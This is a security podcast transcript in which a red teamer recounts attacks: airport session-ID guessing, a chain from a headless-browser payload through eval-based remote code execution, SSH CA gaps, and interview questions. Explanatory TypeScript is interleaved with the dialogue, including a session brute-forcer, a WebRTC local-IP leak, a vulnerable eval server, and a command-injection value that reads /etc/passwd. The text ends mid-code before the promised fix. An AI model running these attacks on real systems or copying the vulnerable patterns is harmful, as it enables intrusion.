16. Will Butler, Red Team at Robinhood and Co-Founder of Truffle Security: From Hacking Airports to Leading Red Teams

Welcome, everyone, to the Security Podcast of Silicon Valley. I'm here today with a very special guest, Will Butler. Good to have you on the show. Thanks so much for having me, John.

So Will brings with him a great deal of security experience, and I would love to go through just a quick summary. He got into security first by hacking airport physical security systems at the age of 15. He has degrees in economics and finance. Oh, and philosophy, because he figured he could teach himself security but wanted to start his own company someday.

He actually started as a red team consultant at PwC, working with a wide variety of companies in terms of industry, size, and maturity. Then he moved over to Apple, where he was on the AppSec team for service products like Apple Music, iCloud, Apple Pay, Siri. I think your Siri might have heard that. I think so.

That's so funny. Siri, go away. That happens to me all the time. Yeah, that does.

No, I was on the iTunes security team and the DRM team. So maybe we need to look at that. I'm sure you'll have some good stories. I bet we overlap.

I was underneath that crazy Frenchman, Augustin Farrugia. I know exactly who you're talking about. Really? Yeah, okay.

So they kept us tucked away in the back corner and wouldn't let us talk to anyone else. But I knew other people existed. They must have been doing some of the good stuff over there too. So anyway, after your time with Apple, you moved into management.

You started a small red team focusing on the same areas. You started the red team at Cruise, the self-driving car company here in San Francisco. Looks like you grew that team from zero people up to eight people. You hired some illustrious folks like Mubix and.

. . Carnal0wnage. That's my boss here, Chris Gates.

That's an amazing team. That's his handle? I love it too.

So you were doing some red teaming for Cruise. And next you decided that while you did really enjoy the foray into people management, and you're likely to do it again, your real passion was actually technical work. And that you were just not done learning.

And so you moved to BitMEX, the largest Bitcoin exchange in the world, as a staff red teamer. That was also a huge learning experience because it was a small company facing very real stakes and probably some very interesting adversaries. And then you followed your manager from BitMEX, Chris Gates, over to Robinhood, where you are the red team tech lead.

And at Robinhood, you do things like designing your assessments, delivering red team presentations, using your perspective to influence the security roadmap where it makes sense. Yeah, that's good. And you also are the co-founder of Truffle Security. And Dylan, your co-founder there, was actually on a previous episode of the Security Podcast of Silicon Valley.

Gotcha. Gotcha both. Are there any other co-founders on Truffle Security that we should have on the podcast? There are a few, yes.

There's Dustin Decker and Julian Dunning, both extremely interesting. I'm sure that you'd have a great time talking to them. Amazing. We'll have to pull them into the podcast as well.

And so it looks like at Truffle Security, you're taking an open source product, TruffleHog, and building out the sort of internal secret scanner that you've seen a lot of people struggle to build themselves. So instead of watching them struggle, you're offering an enterprise SaaS solution, I would imagine, that folks can just drop in to get up and running. Hey, thank you so much for joining. No, thank you for having me.

Okay, so maybe you'd like to share that initial story with all of our listeners of how did you get into security? Yeah, absolutely. Yeah, this is the story I always like to tell people. So I got into security pretty young.

I was a mischievous little kid and I went to a Montessori school with a kind of like basic computers class where they taught you how to make a web page in HTML and JavaScript and things like that. I gravitated towards security because I loved messing with the kids in my school and had read a lot of the hacker lore. And so I naturally gravitated towards that. So then at one point, I was 15, I wanted to get a summer job and I found a job at the local airport cutting grass.

So on my very first day, they were sending me to training on how not to get run over by airplanes when cutting the grass at an airport, which is, you know, good training. That's important. That sounds very important. Yeah, so then right in the middle of the training, it breaks, and it's some old Adobe Captivate presentation.

I thought I could fix it, so I tried and it worked. And they were like, oh, computer things. You should be an intern in our IT department. We need people.

So I ended up being an intern that summer in their IT department. And one day I was looking into a bug for a coworker when I came across this system on our network. And I started looking at the web application and. .

. I noticed that it was returning a very suspiciously small session ID cookie. It was just a number, and it was only about three orders of magnitude, a few thousand possible values at most. And so you're thinking like, huh, that's suspiciously low.

I wonder what happens when I log out and log back in. And it had only incremented by five. So I'm thinking, okay, I know how this algorithm works. So I wrote a quick little script to just try thousands of session IDs and see what happened.
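
For listeners who want the flavor of that script, here's a minimal sketch in TypeScript (Node 18+, which has a built-in fetch). The URL, cookie name, and success check are all assumptions for illustration:

```typescript
// Minimal session ID enumeration sketch. Hypothetical endpoint and cookie name.
const TARGET = "http://target.example/dashboard"; // placeholder URL

async function isLiveSession(id: number): Promise<boolean> {
  const res = await fetch(TARGET, {
    headers: { Cookie: `sessionid=${id}` }, // cookie name is an assumption
    redirect: "manual", // a redirect to a login page usually means "not a session"
  });
  return res.status === 200;
}

async function main() {
  // The ID was only ~3 orders of magnitude and incremented by ~5 per login,
  // so a few thousand guesses cover the entire space.
  for (let id = 1; id <= 10_000; id++) {
    if (await isLiveSession(id)) console.log(`live session: ${id}`);
  }
}

main().catch(console.error);
```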

Turns out I landed on an administrator session, and I could control almost everything in this application. So I decided to look around and figure out what this application did. It turns out that it controlled almost all physical security at the airport, everything from the hand readers to the door locks to the cameras. And so at that point, I go to my boss, and I'm like, oh, this is bad.

We should look into this. And he tells me something interesting, which is that the airport actually didn't write this, as I thought they did. It was some independent contractor, and this software is deployed at many airports all throughout the country. And he also tells me that for maintenance reasons, this software is actually facing the internet as well.

And it is internet-facing in the underlying deployment model. Wow. Yeah, it's no good. So then we report it up to the head of our local little port authority that runs the airport.

And he tells me that it turns out Obama's flying into this airport in two weeks, so the Secret Service is out conducting a security assessment of the airport and heard about it. So we ended up getting on the phone with the contractor, getting it patched, and they hired me to review some of their software after that. So then that's kind of like how I got into the consulting side of things. And I did end up going to college, but I figured, like you said, that I could maybe teach myself security and computer science, but it would be more difficult to teach myself the principles of economics, finance, and accounting, and things like that.

And I always wanted to start my own business someday, so I thought it would be good to take this opportunity to learn something in college that I might not otherwise be able to. And so we'll see how that works out for me, because I don't actually have a CS degree, and I do occasionally feel that pain. But I'm glad that I ended up with those degrees because they've definitely been useful on the business side of things. Oh, I can imagine that complements all of the technical skills, the technical horsepower.

So if you have the drive to go off and dig into those technical pieces, that sounds like a perfectly good use of your time in college. So you also listed philosophy as an interest, a point of interest. I also love philosophy. Do you have a favorite philosopher?

Oh, so I like the Greeks. I read a lot of the ancient Greek philosophers. I got to say I'm relatively out of practice. I have not read a lot of philosophy lately, but it was something that I was always interested in at the time.

And so I figured I should just write a few papers and take the classes. It wouldn't be that much more work than I'd otherwise be doing. But I found it rewarding because, and I forget who said this, someone smarter than me, there's a quote I like: philosophy is the science of thinking clearly.

And I really think it's upped my rigor quite a lot. Yeah, I get that 100%. I really enjoyed it. I have to say, like understanding where meaning comes from, or morality in some sense.

And I suppose being a red team expert, it changes your relationship to power, right? You can make these systems do pretty much anything with enough time and energy and focus. So having a strong moral compass, I'm sure, is part of the territory in your line of work, specifically as a red teamer. Yeah, I think that's a really good point.

I think that my degrees have interesting security applications that haven't always been obvious to me and certainly weren't at the time. Understanding economics and its effects on attacker incentives, or like you said, moral philosophy and how we navigate our careers and things like that. Yeah, it's very interesting. Or finance to really understand the business impact of some of the vulnerabilities that we find.

Exactly. Sometimes something can feel very scary from a security point of view, but then when you look at it from a business point of view, you're like, well, it doesn't impact our core business. And so is that really worthwhile to spend all of these resources to get us to that 100% mark or is that an accepted risk for the business? Yeah, and similarly, the incentives that attackers face.

Exactly. So some of the attackers, they're making the same economic choices as the businesses. That's a really interesting perspective. I've never flipped that before.

Yeah, and something I love doing is listening to stories about leaks from various threat actors, like their chat logs or something, and learning how much they actually function like your average developer team. They have SREs and they have SWEs. They have PMs, and it's very. .

. Oh, they have PMs? What sort of things do they PM? Like product managers?

Yeah, I guess. You know what? I admittedly haven't looked into this a ton, but I listen to the Risky Business podcast a lot. They're constantly talking about how similar some of these crews are to your average security or software engineering team, and it's fascinating.

I imagine. That's a really interesting perspective. I hadn't thought of them as full-functioning teams before. Sometimes it's just easier to think of them as that nebulous, faceless adversary out there, but they're not.

They're human beings just like the rest of us, and they operate, I'm sure, pretty well in small teams of high trust, and they move quickly together, just like everyone else. Yeah, and interestingly, that can make attribution difficult, too. One crew might be the malware developer for several other crews that actually run a campaign, or there might be one that tends to get initial access and then another one that uses that initial access. And so it can make attribution kind of tricky. Yeah, I could imagine.

So if you think about your entire career as a red team member and as a leader and even as a team builder at Cruise, would you care to pick out, like, a very best day that you've ever had through your entire journey? Oh, man. So I have a lot of good days, to be honest with you. I really enjoy my job.

Some of the ones that come to mind first, I really love days when I, as a red teamer, can influence significant amounts of change in an organization. And I think that there have been several at recent companies that I'm going to combine almost into one story, so I'm not revealing too much about any of them. But basically, sometimes we'll do assessments and we give readouts and they don't go anywhere because our findings are really inconvenient. We tend to find vulnerabilities at the boundaries between different systems and abstractions and things that are fundamentally insecure by design.

And so they're not something you can just hand a team and say, go change this configuration setting or patch this software or encode this output as it goes out onto an HTML page in your browser. What we find tends to be, hey, your CI system is insecure by design, and you need to make some major changes to it that are likely to break many other teams' workflows. And so it's pretty easy, I think, to get discouraged when you have findings like that and companies don't want to fix them.

But occasionally, we've been a part of assessments that have really influenced change significantly, where we will be the impetus behind these very large-scale tiger teams that can actually make significant breaking changes across the organization. And I think that we've convinced organizations that it's worth investing the time to fix these things properly. And seeing that is extremely exciting and motivating, and you feel like your work has a lot of value. So those are some of the best days that I've had: seeing stuff really fixed, like breaking changes rolled out, core infrastructure changed, and people really being happy with the attack surface reduction as a result of the work.

No, that sounds really meaningful. Like just totally fulfilling to be part of something bigger and larger than just, you know, our day-to-day grind. Yeah. And then, of course, the other best days are when you find cool bugs.

There's just, there's no feeling quite like that. It's a real rush. One of the best days that I can remember is when I found this bug. It's probably my favorite bug, so if you don't mind, I'll give you a really quick spiel about it.

I would love to hear about your favorite bug. Okay, so this is my favorite bug that I found, not my favorite bug ever. People have definitely found way better bugs than this, but this is. .

. Your favorite bug that you have discovered. It's the favorite bug that I've discovered. So one time I was registering new phishing domains for a red team exercise with a client.

And I noticed that approximately every hour on the hour after we registered these domains, we would get a very specific set of HTTP requests from some odd user agents. So like outdated Chrome, like way outdated Chrome, or like an outdated Python requests user agent or something like that. This was actually before the engagement started, so we reached out and tried to figure out what this was at the client. And it turns out they had a very cool piece of software that would ingest domains, try to figure out.

. . which ones were sufficiently similar to domains that the company owned, and then see if the pages were sufficiently similar to any of the company's pages, and if so, they could get ahead of them, which I thought was awesome. I'm like, that is a really cool piece of technology to have.

And I was thinking, though, if you're rendering attacker-controlled JavaScript, that's the interesting bit of attack surface for me. I'm wondering if there's anything I can do with that. So we ended up sending back a payload that used the WebRTC API to get the local IP addresses of network interfaces on the instance running the headless browser. And we then pushed another bit of JavaScript that did a little bit of screenshotting of various HTTP services that were running on that local /24.
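
The first-stage trick described here is the classic WebRTC ICE-candidate leak. A browser-context TypeScript sketch of the idea follows; note that modern browsers now mask host candidates behind mDNS .local names, so this leaked far more then than it would today:

```typescript
// Browser-context sketch of the WebRTC local-address leak.
// No STUN/TURN servers needed: host candidates alone reveal local interfaces.
const pc = new RTCPeerConnection({ iceServers: [] });
pc.createDataChannel("probe"); // a channel is required to kick off ICE gathering

pc.onicecandidate = (event) => {
  if (!event.candidate) return; // a null candidate signals gathering is finished
  // Candidate lines look like: "candidate:<foundation> 1 udp <prio> <addr> <port> typ host ..."
  const match = /candidate:\S+ \d+ \S+ \d+ (\S+) \d+/.exec(event.candidate.candidate);
  if (match) {
    // In the story, addresses like this seeded a probe of the local /24.
    console.log("local candidate address:", match[1]);
  }
};

pc.createOffer().then((offer) => pc.setLocalDescription(offer));
```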

And we found a very interesting application. It was a simple dashboard application that was just displaying data from a database. It appeared static, didn't really have much functionality other than you could just click a couple buttons and it would show different stats. But I looked into it because it turned out it was a vendor product, and I looked into this a little more.

And the way that it works is hilarious. So the query string of the URL was just the name of the database table that it was showing the statistics about. Like, it wasn't a query parameter. It was literally just the name of the table.

And the way it worked is literally, it evaluates the string in an esoteric programming language. I won't get into the language because it might tell you too much about this, but it's a very weird esoteric programming language. And functionally, it's just calling eval on your query string. That's even worse.

Even worse. I love this. Way more esoteric than Lisp. And so it's calling eval on your query string. So this is perfect.

It's literally an RCE that's triggerable from a simple GET request. So I can use this JavaScript that I'm writing in the headless browser to trigger the RCE. So I'm super pumped about this at this point. And I look into this language.
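
To make that anti-pattern concrete for readers, here's the shape of the bug sketched as a Node/TypeScript server. The real product used an esoteric language, not JavaScript, so this is purely illustrative:

```typescript
// Illustrative only: the vulnerable product evaluated its query string in an
// esoteric language runtime; this Node sketch shows the same shape of bug.
import * as http from "node:http";

http.createServer((req, res) => {
  // Intended use: GET /stats?user_table -> show stats for the "user_table" table.
  const query = (req.url ?? "").split("?")[1] ?? "";

  // DANGER: the "table name" goes straight to the language runtime.
  // Any GET request can now execute arbitrary code on this host.
  const result = eval(decodeURIComponent(query));

  res.end(String(result));
}).listen(8080);
```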

I learn it enough that I can write a payload. And I get code running on this host. But it turns out it's not that useful because the host that I'm running on has very little access to anything. It doesn't have a whole lot of network access.

It has a very low-privileged Kubernetes service account. It can't talk to the AWS metadata API. It's connecting to some read replica of a non-prod database that nobody cares about, with no interesting data in it. So it's not like even that database connection is really valuable.

So I'm thinking, oh, man, was all that just to compromise this silly little unprivileged host? But then I started looking more into this product. And it turns out that the way this product does async is very odd. It allows a database client to basically specify the name of a stored procedure that the server can call on the client when the results are ready.

And so I'm thinking, oh, that's fascinating. So can I just call arbitrary code in this client? Not quite. There is actually a sandbox that this technology uses to make sure that you can't just call arbitrary code in the client.

But I found a way to break out of this sandbox. And so now you actually could execute arbitrary code from the server to the client. So I looked at what clients were connected to this database. Turns out, like, every engineer working on this database in production is connected to the test database.

So I was able to exploit their laptops with this sandbox breakout. And then a few iterations later, we had compromised most hosts on this network at the client. And it was all just from this JavaScript payload in a headless browser. Wow, so I think that was.

. . That's like tugging on the little thread at the end of the sweater, and the whole thing came unraveled before your very eyes. So how long did that take, from when you first noticed all the way to all of those compromised hosts?

It was on the order of a few days. Now, to be honest with you, we did cheat a bit. At this point, we were already talking to the client. They were fairly engaged with their security team.

And so we did just ask them what this technology was. I didn't actually spend the time to, like, fingerprint it and reverse it to figure out what it was. We just asked them. It took two days instead of three days.

Yeah, so it was on the order of a few days, but we did have a little bit of help from the client's team. No, that's great. Just finding those little pieces. I think of red teaming as almost more of an art than a science, because you have to have these intuitions. You notice something kind of flicker in the peripheral vision that a normal engineer would dismiss.

Just like, oh, don't worry about that. That's just an edge case. But, like, you go down, you go all the way down those edge case paths. You just want to see what's there.

See what's there. I completely agree. I agree with you. Yeah, I think that the old Paul Graham essays about hackers and painters come to mind there, where he's talking about how hackers tend to be more like painters than they are like engineers.

When he says hackers, he means makers, creators, and not necessarily security people. But I actually think a lot of his arguments extend to offensive security engineers. There's a large element of creativity, and there's almost a weird lack of formal rigor in reasoning about exploits and which moves will actually work. That's part of your strength, because you don't bring with you all of these preconceptions about how a system is working.

You have to discover it for yourself. And so when you go down that road of discovery, you are actually looking at the real bits and pieces that are not what they should be, but what they are. And there's a difference, and that's what you exploit, right? That is such a good point.

I actually want to talk about that point for a second. So that's something that I really try to impress upon people, is that one of the bits of value that a red team can provide is that security teams and engineering teams too, they often talk about their systems the way that they think they should be, or the way that the documentation says it should be, or the way someone told them it should be. But they haven't actually gone through and operated on those systems. And so there's a lot of like little subtle differences between what the documentation says or what somebody tells you and what's actually going on.

And one of the values that red teams provide is understanding that ground truth and giving your teams a tether to reality, almost. And I have a good story about this. One of the places that I was working, I happened to be good friends with their head of infrastructure. And we were out having beers one night, and I was going over an idea that I had for an attack chain.

And about two thirds of the way through, he stops me and says, I actually don't think that's going to work, because at that point, you'll have to SSH into this box, and we have an SSH CA configured on all those boxes. And in order to get a certificate, you have to have second-factor auth. And you, at that point in the attack chain, wouldn't have any access to somebody's MFA. And I thought about that for a second and was like, okay, yeah, I guess that would be a big obstacle, but like any diligent red teamer, I'm going to try anyway.

Of course. So I try anyway, and it works. And it's not because he was wrong. The SSH CA was actually deployed on most systems, but it turns out that there were a few that it wasn't deployed on, because there were some systems the team didn't know about, so they didn't deploy the SSH CA over there, and those still accepted passwords and keys.

Other systems, they deployed it, but it broke stuff; there was some automation that couldn't use it. And so they rolled it back, and then they never redeployed it. And then there was a third set of systems that did accept the SSH CA but also accepted other forms of SSH authentication.
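
That three-way split is exactly the kind of thing you only find by checking each host. As a hedged illustration, here's a TypeScript sketch that audits a collected sshd_config for the gaps he describes; the directive names are real sshd_config keywords, but gathering the files from every host is left out:

```typescript
// Sketch: flag sshd configs that undermine an SSH-CA-only policy.
// Assumes you've already collected each host's /etc/ssh/sshd_config.
import { readFileSync } from "node:fs";

function auditSshdConfig(path: string): void {
  const text = readFileSync(path, "utf8");
  const directive = (key: string): string | undefined =>
    text.match(new RegExp(`^\\s*${key}\\s+(\\S+)`, "mi"))?.[1];

  const hasCA = directive("TrustedUserCAKeys") !== undefined;
  const passwordAuth = directive("PasswordAuthentication") ?? "yes"; // sshd's default
  const authorizedKeys = directive("AuthorizedKeysFile") ?? "default";

  if (!hasCA) console.log(`${path}: SSH CA never deployed here`);
  if (passwordAuth !== "no") console.log(`${path}: still accepts passwords`);
  if (hasCA && authorizedKeys !== "none")
    console.log(`${path}: per-user authorized_keys may still work alongside CA certs`);
}

auditSshdConfig("/etc/ssh/sshd_config");
```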

And so I think that kind of real ground truth understanding is very valuable. And there aren't a whole lot of teams that are paid to go around and find that kind of stuff. I would call that operational rigor. Like, you are so well grounded in what's actually happening that you are just forced to see all of the exception cases.

It just turns out that those exceptions lead to some pretty interesting security situations, huh? Yeah, absolutely. I think it's definitely that kind of stuff that is going to get you popped. So if you think of your entire career as a red teamer again, but this time instead of thinking through your best days, could you share with us maybe any of your worst days?

Good question. So one type of worst day is when you cause production issues. So red teams inherently have to do some risky things. You're generally manipulating systems that maybe you don't understand as thoroughly as you should.

And sometimes those systems are serving production traffic. And as much as we try to have lots of processes and technology in place to mitigate risk, occasionally something will slip through and it'll cause an outage. And so sometimes I've been on teams where this kind of thing has happened. Luckily, our outages have been very well controlled because as an internal red team, we tend to work very closely with the other engineering teams.

And so we're able to get on top of these issues when they come up. But, for example, remember that database story that I was telling you earlier? Oh, yeah. So there was a weird situation that happened with that, where the runtime with this database was single-threaded. It's like the JavaScript runtimes, except instead of being asynchronous by default, it's actually synchronous by default, and you can specify that it's asynchronous if you want.

But the script that I wrote to enumerate all of the connected clients and then exploit them was synchronous, and while it was running, that meant nothing else could actually make progress. Now, luckily, as I said before, this was a test system. It wasn't serving production traffic. But those are the kinds of subtle gotchas that you can run into, where I didn't realize it, but I was actually preventing all other traffic on that system from making progress, because I didn't understand the runtime quite as thoroughly as I thought I did. And you can run into these situations a lot.

So we do actually go to great lengths to mitigate risk. I'm probably one of the most cautious red teamers you'll talk to, but I really try to think about that a lot and make sure we thoroughly understand what we're doing before we do it. No, that sounds like a very responsible approach to red teaming. But boy, I'll tell you, it gets your blood pressure up sometimes. You're exploiting something and all of a sudden the connection starts hanging, or weird stuff happens, or a Sev pops up. I could imagine. I guess denial of service is just too easy to pull off and call a red team success.

Especially when you're in a production system. Yeah, absolutely. And we've worked with some really fragile systems where you're absolutely right. They were under such heavy load or in such odd configurations that it didn't take a whole lot to cause problems.

But yeah, we really try to make sure that we limit the risk as much as we can, even if that means, by the way, taking another path. I can't tell you how often I've had my teams do that, where we have a promising looking exploit or a promising lateral movement opportunity. And I say, no, let's look for something else, even if that means backtracking a bit because that's too risky. No, that's really interesting.

And this gets into the operational, like, day-to-day grind of a red team. Do you guys often work together on the same project, on the same system, where everyone takes a piece and goes off and investigates or recons and then regroups? Yeah, that's a really good question. I've seen it work different ways, but the way that I generally like to do it is we'll meet initially and come up with our list of research tasks, like the initial recon, for example.

Then we'll split up, each of us with some recon tasks assigned, and we'll work through them. And when we think we're at a point where we have enough moves planned that we're ready to actually run them, we get together and do that stuff live. So if we're remote, we'll all hop on a Zoom, or if we're in person, we'll all go into a conference room and do it together. Then there are also points at which research overlaps, or somebody's expertise is required for research that another operator is doing.

And a lot of times they'll collaborate independently of the rest of the team, seeking advice as necessary. But yeah, that's usually how it works: we get together and we execute. Then once we're at a good stopping point and we don't know what to do next, we divide up research tasks and work independently. Repeat, repeat, repeat until the objective is accomplished.

Nice. Yeah, no, that sounds like good feedback loops and a good amount of independent time versus also working together so that everyone's differences can be brought to the table and shared. And I'm sure that creativity, like in an open and welcoming environment, can really get going in those small groups. Yeah, absolutely.

And even when we're working independently on our own tasks, we're usually posting updates in Slack, and folks are collaborating there. So there's still plenty of collaboration that happens, but we're usually exploring our own tasks mostly independently, doing things like vuln research or recon or things like that. Yeah. And the other thing that you mentioned too, that I'm sure maybe some of our listeners caught, is that you're describing this from the perspective of an internal red team, which is really distinct from an external red team, sometimes referred to as contracted pen testers.

Yes. And so what are the differences that you get? What are the advantages and I guess disadvantages too of being an internal red team versus just a one-time shot external pen tester? That is a great question.

There are a lot of differences, and I think it affects how you use the team. And I think a lot of people don't understand the differences, and so they will try to manage one as if it's the other and then be disappointed in the results. And I feel like if you just tweaked your use of the team slightly, you could have gotten infinitely better results.

So I'll delve into a few of the differences and how I think they affect how you use the team. So the first difference is that an external red team is going to be much closer to the real adversary in terms of their knowledge of your environment. And specifically, they're going to be facing similar constraints to a real adversary. They have a time box.

They have very little knowledge about what your company is like from a security perspective. They don't know what controls are in place. They don't know what projects are currently in the works. They don't know what technology you're using.

And they have to figure all that stuff out themselves. The internal red team, they're generally just going to know this stuff. And I know some internal red teams try to be more like an independent red team, but I think that is probably not the best way to use an internal red team. I think an internal red team should actually be fairly well integrated with the rest of the security team.

They should work very closely with everybody else. They should get an idea of what the capabilities of the D&R team are, for example. They should get an idea of where the common vulnerabilities are. Now, a disadvantage of that. .

. . You can actually make your future life a little bit more challenging. Absolutely.

As a red team, as an internal red team. Yeah, so I think that's the eternal conflict, is how independent should your team be? Personally, I've had the greatest success when my internal red teams were not independent at all. They were very tightly integrated with the rest of the security team.

And I think that actually enables them to act almost like security product managers too, which can be a really interesting, unusual role for an internal red team, but one that I've seen work really well. Just as your typical product org has product managers that are supposed to help the team decide what to build, like what features to build, while the engineering team is supposed to decide how to build it, I think security is in a similar position. Your security engineering disciplines, like infosec or AppSec or detection platform, for example, they're the ones who understand how to build things.

They're the ones who know how to build scalable log ingestion pipelines, and they'll be the ones who understand how to fix vulnerabilities across your whole code base and design secure-by-default infrastructure and stuff like that. But they might not necessarily be the ones who know the most about which security controls, if put in place, would make a real attacker's life most miserable. And I think that that is what red teams, and maybe also threat intel folks, are most qualified to opine on. And so I think that red teams can actually be really useful from that perspective and be like pseudo product managers.

And that's something that I think is much easier to do when you're an internal red team and very closely integrated with the rest of the security team. Oh, I imagine. Yeah, for sure. For sure.

I guess from my own experience, one of the things that I've also seen with external red teams, and I don't know why this falls more on external red teams, is those reports that they produce. Sometimes you can ask for, or even contract out, an external-facing, customer-visible summary of a report. And then they'll come in, they'll do an initial assessment. You go through a couple of engineering cycles, fix a whole bunch of the criticals and the highs, and then they come back with another assessment and show the delta, that things are moving in the right direction.

And then at least in B2B plays, where it's a large business selling to another large business, maybe it's an enterprise deal or a large company, you show. . . These customers, these security teams that the sales teams are bumping into that are asking the tough questions around, hey, is this product really secure?

Do you have any internal pen test reports that you can share with us? You can hand them these reports and break down the sales barriers that sort of show up in the B2B play. I'm actually really glad you brought up reports too, because I think that's another really critical difference between an internal and an external red team. So an internal red team has lots of different options for how they add value after the assessment.

An external red team usually only has one, which is the report. An internal red team can do everything from submitting a patch for the bug themselves, to writing a rule that they wish existed, to sitting in on an architecture meeting and providing an opinion. And so I think that gives them all sorts of additional opportunities for having an impact. But then also, another thing that I think is so interesting about the internal-external dynamic is that I never understood how useless my own recommendations were as a consultant until I was on an internal security team.

When I went from consulting over to Apple, I was originally on the AppSec team. And so I would get some consulting reports and have to do things with them. And I was just thinking, I don't expect the consultants to understand our internal context, but because they don't, their recommendations tend to be way overly generic and not useful to us. So I remember one of my first days at Apple, we got some report, and I sat down with the team and pulled out my typical consulting-person explanation for how they should remediate it.

And they were like, oh, yeah, we've already thought of that, but there are 16 different weird edge cases and limitations and restrictions that make all of those solutions completely impractical. Now help us. And I'm like, oh, no. That made me significantly up my security game quickly, because I had to really sit down and understand the context and restrictions that these teams are operating under and design them a solution that mitigated enough.

And so I think that really taught me a lot about the engineering economics of vulns and fixes. And I feel like external teams miss a lot of that stuff. They do miss that. Yeah.

But I don't fault them for it. They're under constraints. They just don't have the context. Right.

They're under time constraints. Right. Yeah. They're under a lot of constraints themselves that make it super difficult to get this kind of context.

And so I'm not blaming them at all for not having this context. This is a safe space for not blaming. It's just for understanding the different positions that folks are put in.

Have you ever been in a situation where you've seen assessments coming in from both external red teams and internal? Like on the same systems? On the same systems. I sure have.

Yeah. And I will say internal teams tend to find more stuff, but it's because they have an undeniable, significant advantage in understanding the tech stack and having a lot of familiarity with the teams and environments and stuff like that. So I've definitely seen both sides of it. But the other thing, though, is the internal teams' reports tend to be a lot lighter, because they know that they're probably just going to end up in a meeting with these teams explaining it anyway.

And a lot of that's going to go into vuln tickets, and a lot of that's going to go into pull requests and things. So I actually find the external teams' reports tend to be of significantly higher quality. Oh, okay. If that's your only venue of communication, I suppose they have to put whatever they've got in there.

And their reputation's on it; their name goes on it. Yeah. And another thing too about external teams is that they often are able to hire subject matter experts that it doesn't make any sense for you to hire. So you might not have enough headcount for some full-time cryptocurrency expert on your red team, but Trail of Bits does.

And they can sell that expert's time to all sorts of other clients who need it. And so they're able to get some really deep subject matter experts looking at a system in a way that your red team, which has to be comprised of more generalists, can't. So I actually think a lot of times it's really useful to have both look at it, because they both have their pros and cons. The external ones are less biased.

They probably have deeper subject matter experts that they can go rely on for different things. And the internal team has more context and knowledge. So I think that having both look at the same systems is actually really valuable. I remember we actually worked with an external red team in a company that I was at and we both operated on the assessment together.

So we had some of their operators and a few of ours, and we went after it together, and that was super cool. Oh, that's amazing. Yeah, I could imagine that an external red team would also be a good option for folks that know that they're at a point where they need a little bit of help. They want that second pair of eyes on their system, someone really bringing that security perspective to the table, but the company's just not big enough or whatever to have an all-out red team in-house already.

And that's an interesting question, even for startups in general, if you're in a regulated space: when is the right time to do your first assessment? Yeah. Is that when you raise your B round and you close your first big customer? I don't know.

That's a really good question, because the economic constraints of startups are really interesting. And so I can't imagine many early startups hiring a red team. But I must say hiring a red teamer early, even if it's just a single person, or even a person that doesn't red team full-time but has that background, can be really useful for that product management perspective that I was talking about before, and kind of the ground truth perspective.

Like having a red teamer help design some of your initial infrastructure and things like that, I think, will pay enormous dividends over time, because a lot of times we're invited in, understandably, only when there's so much momentum built up behind the current infrastructure that it's really difficult to change things, like I mentioned before. And if you get a red teamer in who's comfortable being more of a product manager and not red teaming all the time, I think they can provide immensely valuable perspective that will pay for itself a lot later. Amazing. No, that's really good advice.

Great perspective. So speaking of bringing on red team members, do you have a favorite interview question? Oh, yeah. Okay, so my favorite interview question is actually a hypothetical that I like to give.

So if I'm interviewing for an offsec position, the question that I always ask, that takes up most of the time, is just a hypothetical. And it's: say I hire you, and your first assignment is to recover a private Bitcoin wallet seed key or something like that, some individual file of immense value. Now, obviously, that's not how it works, but, you know, assume it is. Sure, just a fun place to start.

Yeah, and you start with no access and you start with no internal knowledge. And to make it easier, you can assume that the key is just a single file on a single EC2 instance. Now, I ask them, walk me through how you'd approach this problem to begin with. So it's pretty vague right now, and I'm hoping that they're going to do things to try to make it more concrete.

So they would say, like, all right, I'm going to start by doing some recon and figuring out things like: do they own any IP space? What domains do they use for their infrastructure? What subdomains of those domains exist? Where do they point?

Is it to some cloud infrastructure? So what is it? Things like that. Like, do they use S3 buckets?

Is their registrar Route 53? Stuff like that. And then I give them assumptions to work with to narrow it down a little bit. So I'll say, all right, assume your dummy recon returned X, or assume that your port scanning returned the following set of hosts and ports, stuff like that. And then we go through the hypothetical.
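
As a toy illustration of that first recon step, here's a TypeScript sketch that checks which guessed subdomains of a hypothetical domain resolve, and to where; the wordlist and domain are made up:

```typescript
// Toy first-pass recon: resolve guessed subdomains of a hypothetical domain.
import { resolve4 } from "node:dns/promises";

const GUESSES = ["www", "vpn", "mail", "dev", "staging", "jenkins"]; // assumed wordlist

async function enumerateSubdomains(domain: string): Promise<void> {
  for (const sub of GUESSES) {
    const name = `${sub}.${domain}`;
    try {
      const addrs = await resolve4(name);
      console.log(`${name} -> ${addrs.join(", ")}`); // does it point at cloud IP space?
    } catch {
      // NXDOMAIN or no A record; move on to the next guess.
    }
  }
}

enumerateSubdomains("target.example");
```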

And then what I try to do is, as the candidate brings up various technical topics, I like to drill down into those topics as far as I can, to see where the candidate's knowledge stops, or where my knowledge stops, actually. That happens all the time, and that's great. I love it, because then you're learning in the interview yourself too, right? Yes, I love learning in the interview.

It happens all the time. And I feel like either way, regardless of who stops first, I understand where your minimum level of depth is. You know what I'm saying? Like, you can go deeper than me, maybe, but I know where the minimum is.

And if I can go deeper than you, I still understand where the maximum is. That's very useful information to me. And the reason I like this is because it feels a lot less like technical trivia than just asking them these questions directly, because the candidate is almost entirely in control of the technical topics that we discuss. I just try to discuss them in a decent amount of depth.

So an example of me diving deeper is, if a candidate told me that they would look for a specific type of vuln, like a command injection vulnerability, I would stop them and say, okay, explain to me a command injection vulnerability as if I'm the developer who wrote it. How would you do that? And then I would ask them questions like, what's the root cause of that vulnerability? How would I, as a developer, fix that vulnerability?

How would you discover this vulnerability in a very large collection of applications with a lot of functionality? Say you were trying to exploit it and the application returned all these different error conditions; how would you try to troubleshoot it and get the exploit working? Or let's say that you were trying to exploit it, but you couldn't see the results of your commands.

How would you get the results, or how would you try to infer them? What if egress was heavily restricted? How would you infer or get your results then? And then, how would you fix it, assuming different weird constraints?

What if you had to fix it, but the application still had to start a subprocess with a single binary with attacker-controlled arguments? How could you do that safely? Things like that. And so I try to dig into a lot of depth with each technical topic that the candidate brings up. And I feel like that gives me a really good understanding of their breadth, depth, and areas of focus, based on the stuff that they bring up.
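
For readers following along, a minimal TypeScript sketch of the vulnerability class, and of a fix under the exact constraint he names, a subprocess that must still run with attacker-controlled arguments. The ping feature is a stand-in example:

```typescript
// Command injection in one picture (hypothetical "ping a host" feature).
import { exec, execFile } from "node:child_process";

// Vulnerable: attacker input is spliced into a shell command line.
// host = "8.8.8.8; cat /etc/passwd" runs a second command.
function pingUnsafe(host: string): void {
  exec(`ping -c 1 ${host}`, (_err, stdout) => console.log(stdout));
}

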